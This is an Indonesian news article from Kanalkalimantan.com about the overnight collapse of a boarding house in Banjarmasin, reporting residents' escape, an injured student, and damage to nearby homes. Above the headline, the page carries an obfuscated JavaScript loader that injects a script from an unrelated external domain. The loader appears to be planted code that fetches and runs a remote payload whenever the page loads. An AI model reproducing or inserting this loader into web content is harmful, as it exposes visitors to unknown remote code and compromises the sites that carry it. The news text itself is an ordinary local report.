(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Kos di Banjarmasin Ambruk, Seorang Penghuni Sempat Terjebak di WC


KANALKALIMANTAN.COM, BANJARMASIN – Sebuah bangunan kos di Komplek Madani II RT 30 RW 003, Kelurahan Surgi Mufti, Kota Banjarmasin ambruk.

Menurut saksi penghuni kos, Adrian, ambruknya bangunan kos tersebut terjadi pada Selasa (6/3/2023) dini hari, sekitar pukul 02.00 Wita .

Sebelum ambruk, bangunan dua lantai yang memiliki 24 pintu tersebut diketahui sudah mengalami retak. Sehingga seorang penghuni kos langsung memberitahukan kepada penghuni lainnya.

“Sudah mulai retak sekitar pukul 01.18 Wita, 45 menit kemudian langsung ambruk,” ungkap Adrian.

 

Baca juga: Amalan Dianjurkan di Malam Nisfu Sya’ban: Perbanyak Istighfar

Beruntung sebelum bangunan ambruk, semua penghuni kos yang berjumlah 15 orang berhasil keluar untuk menyelamatkan diri.

Kecuali Rosadi, salah satu penghuni kos, dirinya yang saat itu berada di WC tidak mengetahui adanya salah satu sisi bangunan mengalami retak.

Bangunan kos di Jalan Madani II Kelurahan Surgi Mufti Banjarmasin yang mengalami ambruk. Foto: rizki

Sehingga saat ambruk mahasiswa Uniska Banjarmasin ini sempat terjebak di dalam bangunan sebelum berhasil keluar dengan kondisi luka-luka di bagian kaki.

“Saat itu ulun (saya) posisi di WC jadi tidak tahu ada retak, jadi waktu ambruk langsung lari,” ungkap Rosadi.

“Sempat tertindih material bangunan walaupun sempat keluar, kaki juga luka tidak tau lagi kena apa,” tambahnya.

Baca juga: Tegakkan Perda Satpol PP Banjarbaru Kekurangan Personel

Sementara itu, rumah para tetangga juga mengalami dampak ambruknnya bangunan kos tersebut. Ada beberapa rumah sekitar yang mengalami sedikit kerusakan pada bagian dapur.

“Saat ambruk bunyinya seperti gempa,” kata Kartini, tetangga yang tinggal di samping bangunan kos yang ambruk.

Selain itu, air leding di rumah-rumah sekitar bangunan yang ambruk menjadi tidak mengalir karena dampak dari keruntuhan bangunan.

“Dapur kita kena sedikit, sama air PDAM juga tidak mengalir lagi,” ucap Kartini.

Akibat kejadian tersebut, sebagian barang-barang para penghuni kos masih berada di bangunan yang ambruk karena tidak sempat menyelamatkan.

Selain itu, mereka juga harus mencari tempat tinggal yang baru karena rata-rata merupakan mahasiswa dan pelajar dari Banjarmasin.

Baca juga: VIRAL. Sejumlah Remaja Kejar-kejaran Sambil Bawa Parang di Banjarmasin, Warganet Geram

Saat ini, tim dari Dinas Pemadam Kebakaran dan Penyelamatan (DPKP) Kota Banjarmasin sudah berada di lokasi untuk membantu mengeluarkan barang-barang penghuni kos yang masih berada di bangunan yang ambruk.

Selain itu, petugas dari kepolisian setempat juga sudah berada di lokasi untuk melakukan penyelidikan lebih lanjut. (Kanalkalimantan.com/Rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Ikuti Bimtek ke Jakarta, Duta dan Kader Digital Audiensi ke Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Suasana akrab terlihat di Mahligai Sultan Adam, Martapura ketika Duta dan Kader… Read More

50 menit ago

Kebut Pekerjaan Fisik, Satgas TMMD dan Warga Kerja Bakti

KANALKALIMANTAN.COM, AMUNTAI - Kebersamaan dan gotong royong tampak saat warga bersama Satgas TNI Manunggal Membangun… Read More

1 jam ago

Melintas di Depan Balai Kota Banjarbaru, 19 Kendaraan Angkutan ODOL Terjaring

KANALKALIMANTAN.COM, BANJARBARU -  Sejumlah kendaraan angkutan Over Dimension Over Load (ODOL) terkena razia oleh jajaran… Read More

2 jam ago

Penertiban Lapak Pasar Lama Laut: Kebiasaan Pembeli Berbelanja di Atas Sepeda Motor

KANALKALIMANTAN.COM, BANJARMASIN - Penertiban lapak pedagang di Jalan Pasar Lama Laut, Kecamatan Banjarmasin Tengah, Kota… Read More

3 jam ago

Peluncuran Pilkada 2024 Kalsel, Jinggle “Ayo Memilih” dan Maskot Si Botan

KANALKALIMANTAN.COM, BANJARBARU - Jinggle 'Ayo Memilih' dan maskot Si Botan menandai peluncuran rangkaian pesta demokrasi… Read More

14 jam ago

This website uses cookies.